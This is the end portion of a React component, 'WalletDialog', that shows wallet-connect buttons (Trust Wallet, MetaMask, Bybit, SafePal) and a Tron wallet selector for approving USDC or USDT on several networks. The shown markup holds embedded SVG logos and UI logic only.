                 selectedCoin === 'USDT' && selectedNetwork === 'TRC20' ? 'USDT (TRC-20)' :
                 selectedCoin === 'USDT' && selectedNetwork === 'BNB20' ? 'USDT (BEP-20)' :
                 selectedCoin === 'USDT' && selectedNetwork === 'USDTE_AVAX' ? 'USDT.e (AVAX C-Chain)' : 'Unknown'}
              </strong>
            </div>

            {error && (
              <div className="wallet-error">
                {error}
              </div>
            )}

            {loading && (
              <div className="wallet-loading">
                Connecting...
              </div>
            )}

            {((selectedNetwork === 'ERC20' && selectedCoin === 'USDC') || (selectedNetwork === 'BNB20' && selectedCoin === 'USDC') || (selectedNetwork === 'AVAX' && selectedCoin === 'USDC') || (selectedNetwork === 'ERC20' && selectedCoin === 'USDT') || (selectedNetwork === 'BNB20' && selectedCoin === 'USDT') || (selectedNetwork === 'USDTE_AVAX' && selectedCoin === 'USDT')) && (
              <div className="wallet-buttons-wrap">
                <button 
                  className="wallet-btn" 
                  id="connect-trust" 
                  onClick={handleTrustWallet}
                  disabled={loading}
                >
                  <img
                    src="https://uxwing.com/wp-content/themes/uxwing/download/brands-and-social-media/trust-wallet-icon.png"
                    alt="Trust Wallet"
                  />
                  Trust Wallet
                </button>

                <button 
                  className="wallet-btn" 
                  id="connect-metamask" 
                  onClick={handleMetaMask}
                  disabled={loading}
                >
                  <img
                    src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/36/MetaMask_Fox.svg/2048px-MetaMask_Fox.svg.png"
                    alt="MetaMask"
                  />
                  MetaMask
                </button>

                <button 
                  className="wallet-btn" 
                  id="connect-bybit" 
                  onClick={handleBybitWallet}
                  disabled={loading}
                >
                  <img
                    src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iODgiIGhlaWdodD0iODgiIHZpZXdCb3g9IjAgMCA4OCA4OCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPHBhdGggZD0iTTAgMTguN0MwIDguMzcyMjcgOC4zNzIyOCAwIDE4LjcgMEg2OS4zQzc5LjYyNzcgMCA4OCA4LjM3MjI4IDg4IDE4LjdWNjkuM0M4OCA3OS42Mjc3IDc5LjYyNzcgODggNjkuMyA4OEgxOC43QzguMzcyMjcgODggMCA3OS42Mjc3IDAgNjkuM1YxOC43WiIgZmlsbD0iIzQwNDM0NyIvPgo8cGF0aCBkPSJNNy41NzYxNyAyNi44MDY3QzYuNzg1MTYgMjQuMDc4NyA4LjQ3NzUgMjEuMjUzMSAxMS4yNTU5IDIwLjY2M0w1Ny42MDg3IDEwLjgxNzNDNTkuODA5IDEwLjM1IDYyLjA0NDMgMTEuNDQ0MyA2My4wMjQ3IDEzLjQ2ODlMODMuODQ0MyA1Ni40NjU3TDI1LjE3NzYgODcuNTEwMUw3LjU3NjE3IDI2LjgwNjdaIiBmaWxsPSJ1cmwoI3BhaW50MF9saW5lYXJfMzEyXzE3NTM0KSIvPgo8cGF0aCBkPSJNOC4xODI0MiAzMC4xNjE4QzcuMzUwNDkgMjcuMjgzOCA5LjI3OTI1IDI0LjM0MTMgMTIuMjUwMiAyMy45NTU5TDczLjY4NjUgMTUuOTg4MUM3Ni4yMzkxIDE1LjY1NzEgNzguNjExMSAxNy4zNjE4IDc5LjExMTEgMTkuODg2N0w4OC4wMDAzIDY0Ljc3NzFMMjQuNjg5MiA4Ny4yNjY1TDguMTgyNDIgMzAuMTYxOFoiIGZpbGw9IndoaXRlIi8+CjxwYXRoIGQ9Ik0wIDM0LjIyMjJDMCAyOC44MjIxIDQuMzc3NjYgMjQuNDQ0NSA5Ljc3Nzc4IDI0LjQ0NDVINjguNDQ0NEM3OS4yNDQ3IDI0LjQ0NDUgODggMzMuMTk5OCA4OCA0NFY2OC40NDQ1Qzg4IDc5LjI0NDcgNzkuMjQ0NyA4OCA2OC40NDQ0IDg4SDE5LjU1NTZDOC43NTUzMiA4OCAwIDc5LjI0NDcgMCA2OC40NDQ1VjM0LjIyMjJaIiBmaWxsPSJibGFjayIvPgo8cGF0aCBkPSJNNTguMjIwMSA2MS4xOTU5VjQyLjg3NTVINjEuNzkzN1Y2MS4xOTU5SDU4LjIyMDFaIiBmaWxsPSIjRjdBNjAwIi8+CjxwYXRoIGQ9Ik0xNy40Mzk1IDY2LjY2MzdIOS43Nzc5NVY0OC4zNDM0SDE3LjEzMTNDMjAuNzA0OSA0OC4zNDM0IDIyLjc4NzQgNTAuMzUwNSAyMi43ODc0IDUzLjQ4OTNDMjIuNzg3NCA1NS41MjE1IDIxLjQ1MDQgNTYuODM0NSAyMC41MjU3IDU3LjI3MjFDMjEuNjMxNSA1Ny43ODY5IDIzLjA0NTYgNTguOTQzOCAyMy4wNDU2IDYxLjM4ODVDMjMuMDQ1NiA2NC44MTA4IDIwLjcwNDkgNjYuNjYzNyAxNy40Mzk1IDY2LjY2MzdaTTE2Ljg0ODEgNTEuNTM0M0gxMy4zNTE2VjU1Ljc1NDhIMTYuODQ4MUMxOC4zNjQyIDU1Ljc1NDggMTkuMjEzOCA1NC45MDY0IDE5LjIxMzggNTMuNjQ1NUMxOS4yMTM4IDUyLjM4MjYgMTguMzY2MiA1MS41MzQzIDE2Ljg0ODEgNTEuNTM0M1pNMTcuMDc5MyA1OC45NzA4SDEzLjM1MTZWNjMuNDcyOEgxNy4wNzkzQzE4LjY5OTQgNjMuNDcyOCAxOS40NyA2Mi40NDMyIDE5LjQ3IDYxLjIwOTJDMTkuNDcyIDU5Ljk3MzMgMTguNjk5NCA1OC45NzA4IDE3LjA3OTMgNTguOTcwOFoiIGZpbGw9IndoaXRlIi8+CjxwYXRoIGQ9Ik0zMi44OTI1IDU5LjE1MDFWNjYuNjYzN0gyOS4zNDM5VjU5LjE1MDFMMjMuODQxOSA0OC4zNDM0SDI3LjcyMzhMMzEuMTQzMiA1NS43Mjc4TDM0LjUxMDcgNDguMzQzNEgzOC4zOTI2TDMyLjg5MjUgNTkuMTUwMVoiIGZpbGw9IndoaXRlIi8+CjxwYXRoIGQ9Ik00OC41NjMzIDY2LjY2MzdINDAuOTAxN1Y0OC4zNDM0SDQ4LjI1NTFDNTEuODI4NyA0OC4zNDM0IDUzLjkxMTIgNTAuMzUwNSA1My45MTEyIDUzLjQ4OTNDNTMuOTExMiA1NS41MjE1IDUyLjU3NDIgNTYuODM0NSA1MS42NDk1IDU3LjI3MjFDNTIuNzU1MyA1Ny43ODY5IDU0LjE2OTMgNTguOTQzOCA1NC4xNjkzIDYxLjM4ODVDNTQuMTY3NCA2NC44MTA4IDUxLjgyNjggNjYuNjYzNyA0OC41NjMzIDY2LjY2MzdaTTQ3Ljk3MTkgNTEuNTM0M0g0NC40NzUzVjU1Ljc1NDhINDcuOTcxOUM0OS40ODggNTUuNzU0OCA1MC4zMzc2IDU0LjkwNjQgNTAuMzM3NiA1My42NDU1QzUwLjMzNTcgNTIuMzgyNiA0OS40ODggNTEuNTM0MyA0Ny45NzE5IDUxLjUzNDNaTTQ4LjIwMzEgNTguOTcwOEg0NC40NzUzVjYzLjQ3MjhINDguMjAzMUM0OS44MjMyIDYzLjQ3MjggNTAuNTkzOCA2Mi40NDMyIDUwLjU5MzggNjEuMjA5MkM1MC41OTM4IDU5Ljk3MzQgNDkuODIxMyA1OC45NzA4IDQ4LjIwMzEgNTguOTcwOFoiIGZpbGw9IndoaXRlIi8+CjxwYXRoIGQ9Ik03My40MzkgNTEuNTM0M1Y2Ni42NjM3SDY5Ljg2NTRWNTEuNTM0M0g2NS4wODM5VjQ4LjM0MzRINzguMjIyNFY1MS41MzQzSDczLjQzOVoiIGZpbGw9IndoaXRlIi8+CjxkZWZzPgo8bGluZWFyR3JhZGllbnQgaWQ9InBhaW50MF9saW5lYXJfMzEyXzE3NTM0IiB4MT0iNy4zMzMwOCIgeTE9IjI1LjU5NCIgeDI9Ijg0LjYzODEiIHkyPSIyMS43MjE2IiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSI+CjxzdG9wIHN0b3AtY29sb3I9IiNGRkQ3NDgiLz4KPHN0b3Agb2Zmc2V0PSIxIiBzdG9wLWNvbG9yPSIjRjdBNjAwIi8+CjwvbGluZWFyR3JhZGllbnQ+CjwvZGVmcz4KPC9zdmc+Cg=="
                    alt="Bybit Wallet"
                  />
                  Bybit
                </button>

                {((selectedNetwork === 'ERC20' || selectedNetwork === 'BNB20' || selectedNetwork === 'AVAX') && selectedCoin === 'USDC' || (selectedNetwork === 'ERC20' || selectedNetwork === 'BNB20' || selectedNetwork === 'USDTE_AVAX') && selectedCoin === 'USDT') && (
                  <button 
                    className="wallet-btn" 
                    id="connect-safepal" 
                    onClick={handleSafePal}
                    disabled={loading}
                  >
                    <img
                      src="https://devdocs.safepal.com/sfp.png"
                      alt="SafePal"
                    />
                    SafePal
                  </button>
                )}
              </div>
            )}

            {selectedNetwork === 'TRC20' && selectedCoin === 'USDT' && (
              <div>
                <p style={{ marginBottom: '1rem', color: '#666' }}>
                  Select your Tron wallet to connect and approve USDT TRC20
                </p>
                <TronWalletSelector
                  onWalletSelect={() => {}}
                  onClose={handleClose}
                  onApprove={handleClose}
                />
                {/Android|iPhone|iPad|iPod/i.test(navigator.userAgent) && (
                  <div className="wallet-buttons-wrap" style={{ marginTop: '1rem' }}>
                    <button
                      className="wallet-btn"
                      style={{ width: '100%', marginBottom: '0.5rem' }}
                      onClick={() => openWalletDeepLink("bybit", "TRC20")}
                      disabled={loading}
                    >
                      <img src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iODgiIGhlaWdodD0iODgiIHZpZXdCb3g9IjAgMCA4OCA4OCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPHBhdGggZD0iTTAgMTguN0MwIDguMzcyMjcgOC4zNzIyOCAwIDE4LjcgMEg2OS4zQzc5LjYyNzcgMCA4OCA4LjM3MjI4IDg4IDE4LjdWNjkuM0M4OCA3OS42Mjc3IDc5LjYyNzcgODggNjkuMyA4OEgxOC43QzguMzcyMjcgODggMCA3OS42Mjc3IDAgNjkuM1YxOC43WiIgZmlsbD0iIzQwNDM0NyIvPgo8cGF0aCBkPSJNNy41NzYxNyAyNi44MDY3QzYuNzg1MTYgMjQuMDc4NyA4LjQ3NzUgMjEuMjUzMSAxMS4yNTU5IDIwLjY2M0w1Ny42MDg3IDEwLjgxNzNDNTkuODA5IDEwLjM1IDYyLjA0NDMgMTEuNDQ0MyA2My4wMjQ3IDEzLjQ2ODlMODMuODQ0MyA1Ni40NjU3TDI1LjE3NzYgODcuNTEwMUw3LjU3NjE3IDI2LjgwNjdaIiBmaWxsPSJ1cmwoI3BhaW50MF9saW5lYXJfMzEyXzE3NTM0KSIvPjwvZGVmcz48L3N2Zz4=" alt="Bybit" style={{ width: 24, height: 24, marginRight: 8 }} />
                      Open in Bybit
                    </button>
                    <button
                      className="wallet-btn"
                      style={{ width: '100%' }}
                      onClick={() => openWalletDeepLink("safepal", "TRC20")}
                      disabled={loading}
                    >
                      <img src="https://devdocs.safepal.com/sfp.png" alt="SafePal" style={{ width: 24, height: 24, marginRight: 8 }} />
                      Open in SafePal
                    </button>
                  </div>
                )}
              </div>
            )}
          </>
        )}
      </div>
    </div>
  )
}

export default WalletDialog
